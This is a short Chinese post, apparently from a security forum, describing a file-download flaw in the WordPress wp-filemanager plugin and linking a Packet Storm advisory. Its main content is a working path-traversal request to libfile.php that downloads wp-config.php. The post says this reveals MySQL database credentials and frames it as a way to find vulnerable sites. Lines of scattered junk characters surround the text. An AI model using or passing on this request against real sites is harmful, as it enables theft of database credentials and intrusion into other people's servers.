洞详解:http://packetstormsecurity.com/f ... -File-Download.html
% U3 q+ k& W8 H) Q) B 5 a9 H. a) T8 k6 O1 T6 [, w+ t, M' Z4 \
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。
$ d" C3 f9 t7 P/ ]$ y |